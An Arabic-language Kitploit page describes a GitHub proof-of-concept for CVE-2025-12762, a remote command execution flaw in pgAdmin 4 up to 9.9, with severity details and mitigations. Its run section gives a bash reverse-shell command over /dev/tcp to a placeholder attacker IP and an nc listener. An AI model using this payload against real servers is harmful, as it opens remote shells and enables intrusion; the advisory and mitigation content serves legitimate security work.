Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Blackash-CVE-2025-12762 — CVE-2025-12762 | Kitploit
أدوات/GitHubGitHub/djayagit/blackash-cve-2025-12762
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

CVE-2025-12762

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔐 CVE-2025-12762 — ثغرة تنفيذ أوامر عن بعد خطيرة في pgAdmin 4

G58aQGbW0AAL8zH

🚨 ما هي المشكلة؟

توجد ثغرة تنفيذ أوامر عن بعد (RCE) في pgAdmin 4 الإصدارات ≤ 9.9. يمكن للمهاجمين تشغيل أوامر عشوائية على المضيف عندما يكون pgAdmin قيد التشغيل في وضع الخادم ويقوم بمعالجة تفريغ SQL بصيغة PLAIN أثناء الاستعادة.


⚙️ التحليل الفني

📡 ناقل الهجوم

  • قائم على الشبكة — يمكن استغلاله عن بعد 🌍
  • منخفض التعقيد — سهل التفعيل 🧩
  • صلاحيات منخفضة مطلوبة — يكفي وصول مستخدم محدود 🔑
  • لا يتطلب تفاعل المستخدم — بمجرد تفعيله، لا يحتاج أحد للنقر على شيء 🙅‍♂️
  • النطاق: متغير — يمكن أن يمتد الاختراق خارج الوحدة القابلة للاستغلال 🔄

🧨 التأثير

  • السرية: عالية — خطر تسرب البيانات 🔓
  • السلامة: متوسطة/عالية — تغييرات غير مصرح بها ممكنة ✏️
  • التوفر: متوسط — يمكن تعطيل العمليات ⚠️

🏷 درجة CVSS

🟥 9.1 / 10 — خطير


🛠 الإصدارات المتأثرة

  • pgAdmin 4 ≤ 9.9 ❗

🛡 كيفية الإصلاح

✅ التخفيف الأساسي

⬆️ قم بالترقية إلى pgAdmin 4 v10.0 أو أحدث

🚧 إذا لم تتمكن من الترقية فورًا

  • 🔒 قيّد الوصول إلى خادم pgAdmin
  • 📁 اسمح للمسؤولين الموثوقين فقط باستعادة ملفات التفريغ
  • 🧪 تحقق من صحة ملفات التفريغ قبل الاستعادة
  • 👀 راقب السجلات لأي نشاط استعادة مشبوه
  • 🌐 استخدم قواعد جدار الحماية / VPN للحد من التعرض

📌 لماذا هذا مهم

غالبًا ما يُستخدم pgAdmin لإدارة قواعد بيانات PostgreSQL الحيوية، مما يعني:

  • أن المهاجم الذي يستغل هذه الثغرة يمكنه السيطرة على الخادم،
  • الوصول إلى البيانات أو تعديلها،
  • أو حتى التحرك بشكل أعمق داخل شبكتك 🕵️‍♂️

✨ كيفية التشغيل (دقيقتان)

root@kitploit:~
# 1. احفظ الملف باسم CVE-2025-12762.py
# 2. ثبت التبعية
pip3 install requests

# 3. شغّله
python3 CVE-2025-12762.py

دليل النجاح

بعد التشغيل، تحقق من:

root@kitploit:~
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED

وجود الملف → لقد استغليت CVE-2025-12762 فعليًا.

أمر الصدفة العكسية (اختياري)

استبدل سطر COMMAND بـ:

root@kitploit:~
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

ثم nc -lvnp 4444 → صدفة تفاعلية كاملة.

هذا هو النص البرمجي الدقيق الذي يستخدمه الباحثون والمختبرون وفرق الاختراق حول العالم في نوفمبر 2025.

استخدم بمسؤولية. صوب كل شيء. ابقَ قانونيًا.


🛡️ إخلاء مسؤولية 🛡️

تم تقديم هذا الإثبات المفاهيمي للاستخدام المصرح به والتعليمي فقط.
يمكنك تشغيله حصريًا على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
أي استخدام غير مصرح به غير قانوني وينتهك قوانين إساءة استخدام الحواسيب.
استخدم بمسؤولية، وصوب فورًا بعد الاختبار، ولا تستهدف أي نظام بدون إذن.

تنزيل الأداة